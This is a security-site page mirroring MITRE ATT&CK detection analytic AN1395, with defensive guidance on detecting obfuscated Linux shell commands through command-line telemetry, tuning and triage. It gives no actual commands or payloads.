AN1395: Analytic 1395
Detection of shell commands that leverage encoded execution, command chaining, excessive piping, or unusual token patterns indicative of obfuscation.
Analyst context for executives and security teams
This analytic is about spotting Linux shell command lines that look intentionally hard to read or review, such as encoded execution, long command chains, heavy use of pipes, or unusual token patterns. For leaders, the value is not that every complex command is malicious, but that obfuscated shell activity can hide unauthorized automation, intrusion activity, or risky administrative behavior from normal review and response workflows.
Executive priority
Prioritize this as a SOC and incident-response readiness question for Linux environments: do teams have enough command-line visibility to recognize suspicious obfuscation, investigate it quickly, and separate legitimate administrative scripts from activity that needs escalation? It is also relevant to audit and control evidence because detection depends on whether Linux process and command telemetry is actually collected, retained, searchable, and governed.
Technical view
Validate coverage for Linux command execution telemetry that includes full process command lines and parent-child process context. Because the ATT&CK object provides no formal detection logic and no tactic mapping, teams should treat AN1395 as a detection concept: identify shell commands using encoded execution, excessive command chaining, excessive piping, or unusual token patterns, then tune against known administrative scripts, deployment tooling, monitoring agents, and maintenance jobs. Investigation should focus on context: user account, parent process, working directory, execution frequency, host role, and whether the pattern is expected for that system.
Likely telemetry
- Linux process creation events with full command-line arguments
- Shell execution logs where available
- Parent-child process relationships for shell and utility execution
- User, host, timestamp, and working-directory context
- Script or automation execution records from Linux administration tooling
Detection direction
- Confirm command-line logging is enabled and captures enough detail to see encoded strings, pipes, chained operators, and unusual token patterns.
- Build or review analytics that score suspicious command structure rather than relying on a single token match.
- Tune false positives from legitimate shell scripts, package management, configuration management, backup jobs, monitoring agents, and developer workflows.
- Require triage context around the executing user, parent process, host role, and recurrence before escalating complex commands as suspicious.
- Document blind spots where endpoint logging truncates command lines, omits arguments, or excludes short-lived shell processes.
Mitigation priorities
- Establish reliable Linux command-execution telemetry before depending on this analytic.
- Standardize administrative scripting practices so approved automation is identifiable and easier to suppress or allow-list safely.
- Limit unnecessary shell access and review privileged account usage where local policy supports it.
- Use incident-response playbooks that preserve process, user, host, and script context when obfuscated shell activity is detected.
- Periodically test whether detection content can see representative encoded, chained, piped, or token-heavy shell commands in a controlled environment.
Analyst notes and limits
AN1395 is a detection analytic, not a technique or mitigation. The supplied object only states that it applies to Linux and targets obfuscated-looking shell commands. No relationships, tactics, specific data sources, or detection procedure are supplied, so local engineering judgment is required to implement and tune it.
Official detection logic is not provided, and there are no supplied relationships or tactic mappings. This take does not assert active exploitation, attribution, impact, or guaranteed detection. Coverage depends on local Linux logging depth, command-line retention, parsing quality, and environment-specific baselining.
Analytic 1395
Detection of shell commands that leverage encoded execution, command chaining, excessive piping, or unusual token patterns indicative of obfuscation.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | af8482280ca4… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack AN1395Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.